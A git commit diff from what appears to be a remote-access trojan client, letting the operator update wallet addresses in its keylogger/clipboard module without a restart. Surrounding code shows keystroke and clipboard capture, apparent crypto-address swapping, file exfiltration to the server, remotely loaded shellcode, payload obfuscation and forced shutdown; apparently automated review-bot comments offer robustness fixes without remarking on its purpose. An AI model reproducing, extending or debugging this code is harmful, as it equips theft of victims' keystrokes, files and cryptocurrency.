fix: No need to restart client to update wallet address

yuanyuanxiang
2025-11-09 00:49:34 +08:00
parent b9c5a7af91
commit ce825cffb1
24 changed files with 544 additions and 491 deletions


@@ -428,8 +428,8 @@ VOID IOCPClient::OnServerReceiving(CBuffer* m_CompressedBuffer, char* szBuffer,
HeaderEncType encType = HeaderEncUnknown;
FlagType flagType = CheckHead(szPacketFlag, encType);
if (flagType == FLAG_UNKNOWN) {
Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s'. Mask: %d, Skip: %d.\n",
szPacketFlag, maskType, ret);
Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s'. Mask: %d, Skip: %d.\n",
szPacketFlag, maskType, ret);
m_CompressedBuffer->ClearBuffer();
break;
}


@@ -171,11 +171,13 @@ public:
m_nHostPort = uPort;
}
std::string ServerIP() const {
std::string ServerIP() const
{
return m_sCurIP;
}
int ServerPort() const {
int ServerPort() const
{
return m_nHostPort;
}


@@ -365,32 +365,33 @@ BOOL IsRunningAsAdmin()
return isAdmin;
}
bool EnableShutdownPrivilege() {
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
bool EnableShutdownPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
// 打开当前进程的令牌
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return false;
}
// 打开当前进程的令牌
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return false;
}
// 获取关机权限的 LUID
if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid)) {
CloseHandle(hToken);
return false;
}
// 获取关机权限的 LUID
if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid)) {
CloseHandle(hToken);
return false;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// 启用关机权限
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
CloseHandle(hToken);
return false;
}
// 启用关机权限
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
CloseHandle(hToken);
return false;
}
CloseHandle(hToken);
return true;
CloseHandle(hToken);
return true;
}
VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
@@ -411,18 +412,17 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
Mprintf("收到机器管理命令: %d, %d\n", szBuffer[0], szBuffer[1]);
break;
#endif
switch (szBuffer[1])
{
switch (szBuffer[1]) {
case MACHINE_LOGOUT: {
ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
break;
}
case MACHINE_SHUTDOWN: {
ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
break;
}
case MACHINE_REBOOT: {
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
break;
}
default:
@@ -583,9 +583,12 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
case CMD_MASTERSETTING:
if (ulLength > sizeof(MasterSettings)) {
memcpy(&m_settings, szBuffer + 1, sizeof(MasterSettings));
// Remark 打开键盘记录或下一次启动客户端才会生效
iniFile cfg(CLIENT_PATH);
cfg.SetStr("settings", "wallet", m_settings.WalletAddress);
CManager* pMgr = (CManager*)m_hKeyboard->user;
if (pMgr) {
pMgr->UpdateWallet(m_settings.WalletAddress);
}
}
break;
case COMMAND_KEYBOARD: { //键盘记录
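Review bot: In the `CMD_MASTERSETTING` case `m_hKeyboard` is dereferenced before anything tests it; the added `if (pMgr)` only guards the `user` field, so if the keyboard handle can be null when a settings packet arrives, this faults. `CManager* pMgr = m_hKeyboard ? (CManager*)m_hKeyboard->user : nullptr;` keeps the check in one place. Separately, `m_settings` is filled by `memcpy` from the receive buffer, and `WalletAddress` is then read as a NUL-terminated string by `cfg.SetStr` and by the `const std::string&` parameter of `UpdateWallet`. Nothing visible guarantees a terminator, so if the field is a fixed-size char array (its declaration is not in this hunk) the last byte should be zeroed after the copy. `OnReceive` starts and ends outside the hunk.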


@@ -80,6 +80,13 @@ void CKeyboardManager1::Notify()
WaitForDialogOpen();
}
void CKeyboardManager1::UpdateWallet(const std::string& wallet)
{
m_mu.Lock();
m_Wallet = StringToVector(wallet, ';', MAX_WALLET_NUM);
m_mu.Unlock();
}
void CKeyboardManager1::OnReceive(LPBYTE lpBuffer, ULONG nSize)
{
if (lpBuffer[0] == COMMAND_NEXT)
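Review bot: `UpdateWallet` releases `m_mu` only on the straight-line path: `StringToVector` runs between `Lock()` and `Unlock()`, and if it throws (for example on an allocation failure) the lock stays held. If `m_mu` is a `CLock` (its declaration is not in this hunk), the scoped guard this codebase already has covers every exit: `CAutoCLock guard(m_mu);` followed by the assignment. The readers of `m_Wallet` are outside the hunk, so it is worth confirming they take the same lock before iterating.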


@@ -228,6 +228,7 @@ public:
CKeyboardManager1(IOCPClient*pClient, int offline, void* user=NULL);
virtual ~CKeyboardManager1();
virtual void Notify();
virtual void UpdateWallet(const std::string& wallet);
virtual void OnReceive(LPBYTE lpBuffer, ULONG nSize);
static DWORD WINAPI Clipboard(LPVOID lparam);
static DWORD WINAPI KeyLogger(LPVOID lparam);


@@ -262,16 +262,16 @@ std::string GetCurrentExeVersion()
}
std::string GetCurrentUserNameA() {
char username[256];
DWORD size = sizeof(username);
std::string GetCurrentUserNameA()
{
char username[256];
DWORD size = sizeof(username);
if (GetUserNameA(username, &size)) {
return std::string(username);
}
else {
return "Unknown";
}
if (GetUserNameA(username, &size)) {
return std::string(username);
} else {
return "Unknown";
}
}
LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, const CONNECT_ADDRESS& conn)


@@ -53,6 +53,7 @@ public:
return m_ClientObject ? m_ClientObject->Reconnect(this) : FALSE;
}
virtual void Notify() { }
virtual void UpdateWallet(const std::string &wallet) { }
BOOL Send(LPBYTE lpData, UINT nSize);
BOOL SendData(LPBYTE lpData, UINT nSize)
{


@@ -30,16 +30,30 @@
#pragma comment(lib, "FileUpload_Libx64.lib")
#endif
#else
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs) { return 0; }
int UninitFileUpload() { return 0; }
std::vector<std::string> GetClipboardFiles() { return{}; }
bool GetCurrentFolderPath(std::string& outDir) { return false; }
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs)
{
return 0;
}
int UninitFileUpload()
{
return 0;
}
std::vector<std::string> GetClipboardFiles()
{
return{};
}
bool GetCurrentFolderPath(std::string& outDir)
{
return false;
}
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac) {
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac)
{
finish(user);
return 0;
}
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac) {
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac)
{
return 0;
}
#endif
@@ -311,41 +325,46 @@ CScreenManager::~CScreenManager()
m_ScreenSpyObject = NULL;
}
void RunFileReceiver(CScreenManager *mgr, const std::string &folder) {
void RunFileReceiver(CScreenManager *mgr, const std::string &folder)
{
auto start = time(0);
Mprintf("Enter thread RunFileReceiver: %d\n", GetCurrentThreadId());
IOCPClient* pClient = new IOCPClient(mgr->g_bExit, true, MaskTypeNone, mgr->m_conn->GetHeaderEncType());
if (pClient->ConnectServer(mgr->m_ClientObject->ServerIP().c_str(), mgr->m_ClientObject->ServerPort())) {
pClient->setManagerCallBack(mgr, CManager::DataProcess);
// <20><><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC>׼<EFBFBD><D7BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
char cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
pClient->Send2Server(cmd, sizeof(cmd));
pClient->RunEventLoop(TRUE);
}
IOCPClient* pClient = new IOCPClient(mgr->g_bExit, true, MaskTypeNone, mgr->m_conn->GetHeaderEncType());
if (pClient->ConnectServer(mgr->m_ClientObject->ServerIP().c_str(), mgr->m_ClientObject->ServerPort())) {
pClient->setManagerCallBack(mgr, CManager::DataProcess);
// <20><><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC>׼<EFBFBD><D7BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
char cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
pClient->Send2Server(cmd, sizeof(cmd));
pClient->RunEventLoop(TRUE);
}
delete pClient;
Mprintf("Leave thread RunFileReceiver: %d. Cost: %d s\n", GetCurrentThreadId(), time(0)-start);
}
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size) {
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size)
{
IOCPClient* pClient = (IOCPClient*)user;
if (!pClient->IsConnected() || !pClient->Send2Server((char*)data, size)) {
return false;
}
return true;
if (!pClient->IsConnected() || !pClient->Send2Server((char*)data, size)) {
return false;
}
return true;
}
void RecvData(void* ptr) {
void RecvData(void* ptr)
{
FileChunkPacket* pkt = (FileChunkPacket*)ptr;
}
void delay_destroy(IOCPClient* pClient, int sec) {
if (!pClient) return;
Sleep(sec * 1000);
void delay_destroy(IOCPClient* pClient, int sec)
{
if (!pClient) return;
Sleep(sec * 1000);
delete pClient;
}
void FinishSend(void* user) {
void FinishSend(void* user)
{
IOCPClient* pClient = (IOCPClient*)user;
std::thread(delay_destroy, pClient, 15).detach();
}
@@ -372,17 +391,16 @@ VOID CScreenManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
break;
}
case COMMAND_SCREEN_GET_CLIPBOARD: {
auto files = GetClipboardFiles();
if (!files.empty())
{
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
BYTE szBuffer[1] = { COMMAND_GET_FOLDER };
auto files = GetClipboardFiles();
if (!files.empty()) {
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
BYTE szBuffer[1] = { COMMAND_GET_FOLDER };
SendData(szBuffer, sizeof(szBuffer));
break;
}
}
SendClientClipboard();
break;
}
@@ -393,36 +411,34 @@ VOID CScreenManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
case COMMAND_GET_FOLDER: {
std::string folder;
if (GetCurrentFolderPath(folder)) {
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
char h[100] = {};
memcpy(h, szBuffer + 1, ulLength - 1);
m_hash = std::string(h, h + 64);
m_hmac = std::string(h + 64, h + 80);
if (OpenClipboard(nullptr))
{
if (OpenClipboard(nullptr)) {
EmptyClipboard();
CloseClipboard();
}
CloseClipboard();
}
std::thread(RunFileReceiver, this, folder).detach();
}
break;
}
case COMMAND_GET_FILE: {
case COMMAND_GET_FILE: {
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
auto files = GetClipboardFiles();
auto files = GetClipboardFiles();
std::string dir = (char*)(szBuffer + 1);
if (!files.empty() && !dir.empty()) {
IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn->GetHeaderEncType());
if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) {
if (!files.empty() && !dir.empty()) {
IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn->GetHeaderEncType());
if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) {
std::thread(FileBatchTransferWorker, files, dir, pClient, ::SendData, ::FinishSend,
m_hash, m_hmac).detach();
}
else {
m_hash, m_hmac).detach();
} else {
delete pClient;
}
}
break;
}
}
break;
}
case COMMAND_SEND_FILE: {
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
int n = RecvFileChunk((char*)szBuffer, ulLength, m_conn, RecvData, m_hash, m_hmac);
@@ -444,12 +460,11 @@ VOID CScreenManager::UpdateClientClipboard(char *szBuffer, ULONG ulLength)
if (hGlobal != NULL) {
LPTSTR szClipboardVirtualAddress = (LPTSTR) GlobalLock(hGlobal);
if (szClipboardVirtualAddress == NULL)
{
GlobalFree(hGlobal);
CloseClipboard();
return;
}
if (szClipboardVirtualAddress == NULL) {
GlobalFree(hGlobal);
CloseClipboard();
return;
}
memcpy(szClipboardVirtualAddress, szBuffer, ulLength);
szClipboardVirtualAddress[ulLength] = '\0';
GlobalUnlock(hGlobal);


@@ -48,7 +48,8 @@ public:
std::string m_hash;
std::string m_hmac;
CONNECT_ADDRESS *m_conn = nullptr;
void SetConnection(CONNECT_ADDRESS* conn){
void SetConnection(CONNECT_ADDRESS* conn)
{
m_conn = conn;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>


@@ -91,16 +91,17 @@ int GetIPAddress(const char* hostName, char* outIpBuffer, int bufferSize)
return 0;
}
bool WriteRegistryString(const char* path, const char* keyName, const char* value) {
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_SZ,(const BYTE*)value,(DWORD)(strlen(value) + 1));
bool WriteRegistryString(const char* path, const char* keyName, const char* value)
{
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_SZ,(const BYTE*)value,(DWORD)(strlen(value) + 1));
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
}
char* ReadRegistryString(const char* subKey, const char* valueName)
@@ -126,88 +127,91 @@ char* ReadRegistryString(const char* subKey, const char* valueName)
return data;
}
bool WriteAppSettingBinary(const char* path, const char* keyName, const void* data, DWORD dataSize) {
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
bool WriteAppSettingBinary(const char* path, const char* keyName, const void* data, DWORD dataSize)
{
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_BINARY,(const BYTE*)data,dataSize);
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
}
bool ReadAppSettingBinary(const char* path, const char* keyName, BYTE* outDataBuf, DWORD* dataSize) {
HKEY hKey;
LONG result = RegOpenKeyExA(HKEY_CURRENT_USER,path,0,KEY_READ,&hKey);
if (result != ERROR_SUCCESS) {
*dataSize = 0;
return false;
}
bool ReadAppSettingBinary(const char* path, const char* keyName, BYTE* outDataBuf, DWORD* dataSize)
{
HKEY hKey;
LONG result = RegOpenKeyExA(HKEY_CURRENT_USER,path,0,KEY_READ,&hKey);
if (result != ERROR_SUCCESS) {
*dataSize = 0;
return false;
}
DWORD type = 0;
DWORD requiredSize = 0;
result = RegQueryValueExA(hKey,keyName,NULL,&type,NULL,&requiredSize);
if (result != ERROR_SUCCESS || type != REG_BINARY || requiredSize == 0 || requiredSize > *dataSize) {
*dataSize = 0;
RegCloseKey(hKey);
return false;
}
DWORD type = 0;
DWORD requiredSize = 0;
result = RegQueryValueExA(hKey,keyName,NULL,&type,NULL,&requiredSize);
if (result != ERROR_SUCCESS || type != REG_BINARY || requiredSize == 0 || requiredSize > *dataSize) {
*dataSize = 0;
RegCloseKey(hKey);
return false;
}
result = RegQueryValueExA(hKey,keyName,NULL,NULL,outDataBuf,&requiredSize);
RegCloseKey(hKey);
if (result == ERROR_SUCCESS) {
*dataSize = requiredSize;
return true;
}
result = RegQueryValueExA(hKey,keyName,NULL,NULL,outDataBuf,&requiredSize);
RegCloseKey(hKey);
if (result == ERROR_SUCCESS) {
*dataSize = requiredSize;
return true;
}
*dataSize = 0;
return false;
*dataSize = 0;
return false;
}
#define MD5_DIGEST_LENGTH 16
const char* CalcMD5FromBytes(const BYTE* data, DWORD length) {
static char md5String[MD5_DIGEST_LENGTH * 2 + 1]; // 32 hex chars + '\0'
if (data == NULL || length == 0) {
memset(md5String, 0, sizeof(md5String));
return md5String;
}
HCRYPTPROV hProv = 0;
HCRYPTHASH hHash = 0;
BYTE hash[MD5_DIGEST_LENGTH];
DWORD hashLen = sizeof(hash);
const char* CalcMD5FromBytes(const BYTE* data, DWORD length)
{
static char md5String[MD5_DIGEST_LENGTH * 2 + 1]; // 32 hex chars + '\0'
if (data == NULL || length == 0) {
memset(md5String, 0, sizeof(md5String));
return md5String;
}
HCRYPTPROV hProv = 0;
HCRYPTHASH hHash = 0;
BYTE hash[MD5_DIGEST_LENGTH];
DWORD hashLen = sizeof(hash);
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
return NULL;
}
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
return NULL;
}
if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptHashData(hHash, data, length, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptHashData(hHash, data, length, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
// 转换为十六进制字符串
for (DWORD i = 0; i < hashLen; ++i) {
sprintf(&md5String[i * 2], "%02x", hash[i]);
}
md5String[MD5_DIGEST_LENGTH * 2] = '\0';
// 转换为十六进制字符串
for (DWORD i = 0; i < hashLen; ++i) {
sprintf(&md5String[i * 2], "%02x", hash[i]);
}
md5String[MD5_DIGEST_LENGTH * 2] = '\0';
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return md5String;
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return md5String;
}
const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut)
@@ -350,8 +354,8 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut)
*sizeOut = binSize - 22;
const char* md5 = CalcMD5FromBytes((BYTE*)buffer + 22, *sizeOut);
if (strcmp(md5, hash)==0) {
Mprintf("Read data from registry succeed: %d bytes\n", *sizeOut);
return buffer;
Mprintf("Read data from registry succeed: %d bytes\n", *sizeOut);
return buffer;
}
}
// Registry data is incorrect


@@ -269,7 +269,7 @@ enum {
};
enum MachineCommand {
MACHINE_LOGOUT,
MACHINE_LOGOUT,
MACHINE_SHUTDOWN,
MACHINE_REBOOT,
};


@@ -4,15 +4,14 @@
#include <vector>
#pragma pack(push, 1)
struct FileChunkPacket
{
unsigned char cmd; // COMMAND_SEND_FILE
uint32_t fileIndex; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
uint32_t totalNum; // <20>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
uint64_t fileSize; // <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>С
uint64_t offset; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>е<EFBFBD>ƫ<EFBFBD><EFBFBD>
uint64_t dataLength; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݳ<EFBFBD><EFBFBD><EFBFBD>
uint64_t nameLength; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȣ<EFBFBD><C8A3><EFBFBD><EFBFBD><EFBFBD> '\0'<27><>
struct FileChunkPacket {
unsigned char cmd; // COMMAND_SEND_FILE
uint32_t fileIndex; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
uint32_t totalNum; // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
uint64_t fileSize; // <20><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD>С
uint64_t offset; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>е<EFBFBD>ƫ<EFBFBD><EFBFBD>
uint64_t dataLength; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݳ<EFBFBD><EFBFBD><EFBFBD>
uint64_t nameLength; // <20>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> '\0'<EFBFBD><EFBFBD>
};
#pragma pack(pop)
@@ -28,7 +27,7 @@ typedef bool (*OnTransform)(void* user, FileChunkPacket* chunk, unsigned char* d
typedef void (*OnFinish)(void* user);
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac);
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac);
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac);


@@ -90,18 +90,18 @@ public:
class CAutoCLock
{
private:
CLock& m_cs;
CLock& m_cs;
public:
CAutoCLock(CLock& cs) : m_cs(cs)
{
{
m_cs.Lock();
}
}
~CAutoCLock()
{
~CAutoCLock()
{
m_cs.Unlock();
}
}
};
// 智能计时器,计算函数的耗时


@@ -114,11 +114,11 @@ public:
}
cv.notify_one();
if (workerThread.joinable()) {
try {
workerThread.join();
} catch (const std::system_error& e) {
printf("Join failed: %s [%d]\n", e.what(), e.code().value());
}
try {
workerThread.join();
} catch (const std::system_error& e) {
printf("Join failed: %s [%d]\n", e.what(), e.code().value());
}
}
for (int i = 0; threadRun && i++ < 1000; Sleep(1));
}


@@ -5,89 +5,98 @@
#include <stddef.h>
#pragma once
class ObfsBase {
class ObfsBase
{
public:
bool m_bGenCArray;
ObfsBase(bool genCArray = true) : m_bGenCArray(genCArray) { }
virtual ~ObfsBase() { }
bool m_bGenCArray;
ObfsBase(bool genCArray = true) : m_bGenCArray(genCArray) { }
virtual ~ObfsBase() { }
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
virtual bool WriteFile(const char* filename, uint8_t* data, size_t length, const char* arrayName) {
return m_bGenCArray ? WriteBinaryAsCArray(filename, data, length, arrayName) : WriteBinaryFile(filename, data, length);
}
virtual bool WriteFile(const char* filename, uint8_t* data, size_t length, const char* arrayName)
{
return m_bGenCArray ? WriteBinaryAsCArray(filename, data, length, arrayName) : WriteBinaryFile(filename, data, length);
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> C <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽд<CABD><D0B4><EFBFBD>ļ<EFBFBD>
virtual bool WriteBinaryAsCArray(const char* filename, uint8_t* data, size_t length, const char* arrayName) {
FILE* file = fopen(filename, "w");
if (!file) return false;
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> C <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽд<CABD><D0B4><EFBFBD>ļ<EFBFBD>
virtual bool WriteBinaryAsCArray(const char* filename, uint8_t* data, size_t length, const char* arrayName)
{
FILE* file = fopen(filename, "w");
if (!file) return false;
fprintf(file, "unsigned char %s[] = {\n", arrayName);
for (size_t i = 0; i < length; ++i) {
if (i % 24 == 0) fprintf(file, " ");
fprintf(file, "0x%02X", data[i]);
if (i != length - 1) fprintf(file, ",");
if ((i + 1) % 24 == 0 || i == length - 1) fprintf(file, "\n");
else fprintf(file, " ");
}
fprintf(file, "};\n");
fprintf(file, "unsigned int %s_len = %zu;\n", arrayName, length);
fprintf(file, "unsigned char %s[] = {\n", arrayName);
for (size_t i = 0; i < length; ++i) {
if (i % 24 == 0) fprintf(file, " ");
fprintf(file, "0x%02X", data[i]);
if (i != length - 1) fprintf(file, ",");
if ((i + 1) % 24 == 0 || i == length - 1) fprintf(file, "\n");
else fprintf(file, " ");
}
fprintf(file, "};\n");
fprintf(file, "unsigned int %s_len = %zu;\n", arrayName, length);
fclose(file);
return true;
}
fclose(file);
return true;
}
// ʹ<><CAB9> "wb" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4>ģʽ
virtual bool WriteBinaryFile(const char* filename, const uint8_t* data, size_t length) {
FILE* file = fopen(filename, "wb");
if (!file) return false;
// ʹ<><CAB9> "wb" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4>ģʽ
virtual bool WriteBinaryFile(const char* filename, const uint8_t* data, size_t length)
{
FILE* file = fopen(filename, "wb");
if (!file) return false;
size_t written = fwrite(data, 1, length, file);
fclose(file);
size_t written = fwrite(data, 1, length, file);
fclose(file);
return written == length;
}
return written == length;
}
};
class Obfs : public ObfsBase {
class Obfs : public ObfsBase
{
private:
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t rol8(uint8_t val, int shift) {
return (val << shift) | (val >> (8 - shift));
}
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t rol8(uint8_t val, int shift)
{
return (val << shift) | (val >> (8 - shift));
}
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t ror8(uint8_t val, int shift) {
return (val >> shift) | (val << (8 - shift));
}
// <20><><EFBFBD><EFBFBD><38><CEBB><EFBFBD><EFBFBD>
static inline uint8_t ror8(uint8_t val, int shift)
{
return (val >> shift) | (val << (8 - shift));
}
public:
Obfs(bool genCArray = true) : ObfsBase(genCArray) { }
Obfs(bool genCArray = true) : ObfsBase(genCArray) { }
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {
uint32_t state = seed;
// <20>Գƻ<D4B3><C6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD><DABC>ܺͽ<DCBA><CDBD><EFBFBD>
virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed)
{
uint32_t state = seed;
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
